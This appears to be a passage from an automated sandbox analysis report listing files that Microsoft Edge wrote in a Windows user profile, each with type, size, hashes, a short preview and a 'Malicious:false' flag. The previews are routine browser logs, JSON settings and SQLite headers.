                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.516 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-11:14:57.517 9e0 Recovering log #3.2024/12/23-11:14:57.517 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.152961418081467
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOyv4q2PN723oH+Tcwt8NIFUt8sOvTZmw+sOvJkwON723oH+Tcwt8+eLJ:x/4vVaYebpFUt8sST/+sSJ5OaYebqJ
                                                                                                                                                                                                                                                                                                      MD5:87D036C68349CD122ABC95CA3AE89B3D
                                                                                                                                                                                                                                                                                                      SHA1:536B9E8C7D4DB985EDE5BD1786708BE8DA301211
                                                                                                                                                                                                                                                                                                      SHA-256:79063868DA8E91A77AFA0BF1ACDA004D8F1B8A24F0A75B5345BAA77D953EE3B9
                                                                                                                                                                                                                                                                                                      SHA-512:BF413B9BACF582FA47D619DBC99540309DEA276EA26911DADB87ECCD8A42EE8E386DA194B6172259051C03DFD099F5A320BB9093AE953FD358D3597AC86C16CB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.516 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-11:14:57.517 9e0 Recovering log #3.2024/12/23-11:14:57.517 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):8720
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.21848828281205318
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:GEZllntFlljq7A/mhWJFuQ3yy7IOWUDlvol/dweytllrE9SFcTp4AGbNCV9RUIo:GEZlG75fOlV4/d0Xi99pEY+
                                                                                                                                                                                                                                                                                                      MD5:AB723C943ED9CADCF96D81F53DB681DA
                                                                                                                                                                                                                                                                                                      SHA1:35F0C4E69E5B169B0E4BC7338884884F4ECC29C3
                                                                                                                                                                                                                                                                                                      SHA-256:6052EB658CFAAFCE00388E668D63B1849DE0CFC6E00904A8C80C79C89C855794
                                                                                                                                                                                                                                                                                                      SHA-512:34B8B504C93CFF3CB993AF83B8DFF9FC4A5D6C4277A09B0644C669F16CD46445229D15CCE26C2C834626A32194AE4EAFC12B352EF97ACE0B9A11DD4A1BE02539
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..............I....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.647749923389689
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:aj9P0UP/Kbtfjl+QkQeragam6IQcO773pLXRKToaADhf:adHP/yl+e2NTO7JRKc39
                                                                                                                                                                                                                                                                                                      MD5:C6D9671A7501295866A46F9B7966AF17
                                                                                                                                                                                                                                                                                                      SHA1:EF8E2FFFD4A5E54588BA517F71B5E5909FDD1A78
                                                                                                                                                                                                                                                                                                      SHA-256:068AAB5F0925A4CC1E153B315E51A6750E8AC9CFB7601D26441BD15960F915EE
                                                                                                                                                                                                                                                                                                      SHA-512:B86D897A5E335ECC1A8018C221003E3D439210EB7CA0139850E98573A29850A6951E9F18214448F1AEEC16887D1F521869A1B7446061DA74F0C3D14322467255
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):409
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2280905639790705
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:xgUthvVaYeb8rcHEZrELFUt8sgUh/+sgU75OaYeb8rcHEZrEZSJ:FTVaYeb8nZrExg8qntOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                      MD5:74B3D5BFFDD145D8FE6F433DF3DC5F7F
                                                                                                                                                                                                                                                                                                      SHA1:78C29A8D76C9880D1266A7C28F8DAC8A4087AC91
                                                                                                                                                                                                                                                                                                      SHA-256:42EC37DF5F1B5775F4B5FEA43484803FC2650383DBFB62D771D30FC74DFFA178
                                                                                                                                                                                                                                                                                                      SHA-512:CD16D953C80BCA3640EE962C271A02BF21B4AC603CB690AE386E2DE3683BFE0CD92D47202B389BC7ED1D36BA01084CC13C1B8BBBA20022DC919C4FF903F55DC2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:00.361 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-11:15:00.362 9e0 Recovering log #3.2024/12/23-11:15:00.362 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):409
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.2280905639790705
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:xgUthvVaYeb8rcHEZrELFUt8sgUh/+sgU75OaYeb8rcHEZrEZSJ:FTVaYeb8nZrExg8qntOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                      MD5:74B3D5BFFDD145D8FE6F433DF3DC5F7F
                                                                                                                                                                                                                                                                                                      SHA1:78C29A8D76C9880D1266A7C28F8DAC8A4087AC91
                                                                                                                                                                                                                                                                                                      SHA-256:42EC37DF5F1B5775F4B5FEA43484803FC2650383DBFB62D771D30FC74DFFA178
                                                                                                                                                                                                                                                                                                      SHA-512:CD16D953C80BCA3640EE962C271A02BF21B4AC603CB690AE386E2DE3683BFE0CD92D47202B389BC7ED1D36BA01084CC13C1B8BBBA20022DC919C4FF903F55DC2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:00.361 9e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-11:15:00.362 9e0 Recovering log #3.2024/12/23-11:15:00.362 9e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1660
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.644184609190933
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:nZZsQvnXZlpV03Sx4/ty8t8Eba7AHHk2GJ348ylsT:nZ1vX7p0hdP8osT
                                                                                                                                                                                                                                                                                                      MD5:BC6A6D2168667C97E45A0688E5CA5BD7
                                                                                                                                                                                                                                                                                                      SHA1:A761F29FDFDEF3A7D776CE51D6ABD6F39D94B04B
                                                                                                                                                                                                                                                                                                      SHA-256:316D1CDED4D6AD13D2831EF2C25E8DADE5FAAB96CF11836E388DC9C301F04043
                                                                                                                                                                                                                                                                                                      SHA-512:77801A749621410DD126FD00DF483794AABEA3D5EA07D16873E2EC5BABA1BB25D16018A27DD6D8F397BC3EEBA2CC55AAA5B3ED64941714313DB161D18EFBF352
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..p..................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1734970511760.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734970512857.._https://ntp.msn.com..MUID!.264DEDAF8CF36A9502DCF8F18D816BBC.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734970511855,"schedule":[21,-1,-1,-1,-1,31,32],"scheduleFixed":[21,-1,-1,-1,-1,31,32],"simpleSchedule":[18,47,27,31,44,35,30]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734970511729.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Mon Dec 23 2024 11:15:11 GMT-0500 (Eastern Standa

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.170897065744444
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHkp6q2PN723oH+Tcwt8a2jMGIFUt8sOH5TzXZmw+sOHT1kwON723oH+Tcwt8as:xaS6vVaYeb8EFUt8sa5n/+sax5OaYebw
                                                                                                                                                                                                                                                                                                      MD5:45915CB049A4A301E3EB6B437E927DAE
                                                                                                                                                                                                                                                                                                      SHA1:51532688B5398EA96A5CEB469FA853A76E100D47
                                                                                                                                                                                                                                                                                                      SHA-256:4E39AD4700A966AF51FC34051FEEE38E325034493C809796E3D1F7AC7DD0E1A9
                                                                                                                                                                                                                                                                                                      SHA-512:A9B37D1922101E250FCEB9738238AE676139D0236C5DEC25D554954C8DA32F172F1E0D34DE9D3D5C3604A346DF61246BE0F4FC2746003AC5FA1668B8C0AA61A7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.993 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-11:14:56.994 640 Recovering log #3.2024/12/23-11:14:56.996 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):337
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.170897065744444
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOHkp6q2PN723oH+Tcwt8a2jMGIFUt8sOH5TzXZmw+sOHT1kwON723oH+Tcwt8as:xaS6vVaYeb8EFUt8sa5n/+sax5OaYebw
                                                                                                                                                                                                                                                                                                      MD5:45915CB049A4A301E3EB6B437E927DAE
                                                                                                                                                                                                                                                                                                      SHA1:51532688B5398EA96A5CEB469FA853A76E100D47
                                                                                                                                                                                                                                                                                                      SHA-256:4E39AD4700A966AF51FC34051FEEE38E325034493C809796E3D1F7AC7DD0E1A9
                                                                                                                                                                                                                                                                                                      SHA-512:A9B37D1922101E250FCEB9738238AE676139D0236C5DEC25D554954C8DA32F172F1E0D34DE9D3D5C3604A346DF61246BE0F4FC2746003AC5FA1668B8C0AA61A7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:56.993 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/23-11:14:56.994 640 Recovering log #3.2024/12/23-11:14:56.996 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\05aa96dc-8b4e-43ea-a562-6b5c7091bba1.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6ba036d5-c834-4672-af63-5077eaf107dd.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1452
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                      MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                      SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                      SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                      SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7b35a413-524d-429e-ae09-6b38de4d7e16.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\85708b30-94c8-41ee-8125-1d89b8885051.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.782263309926793
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:tTc4OSh6cqWLvhVoqOpVVv+5pXcf0L/ZJVb:Vc4t0cvLvjoqObWpXI0LhJVb
                                                                                                                                                                                                                                                                                                      MD5:F51B499DC273BC5252864BDF4B2D8D43
                                                                                                                                                                                                                                                                                                      SHA1:62053F7F87EA23FBA33AA7B77721E3A219956344
                                                                                                                                                                                                                                                                                                      SHA-256:92AD4AF7432118ABF119069D996896799C5451CB9E73F60987CA7D92FEF0D24F
                                                                                                                                                                                                                                                                                                      SHA-512:6F45AB60CD5D883E4AEDC8827C8A4E73BDA05D21148FF86BCD1BA4A6D62AB5A324010529C028BD4DFDD0005A293F05C2CF5B93D43178998DE1EF07C5D413346C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1452
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                      MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                      SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                      SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                      SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                      Malicious:false
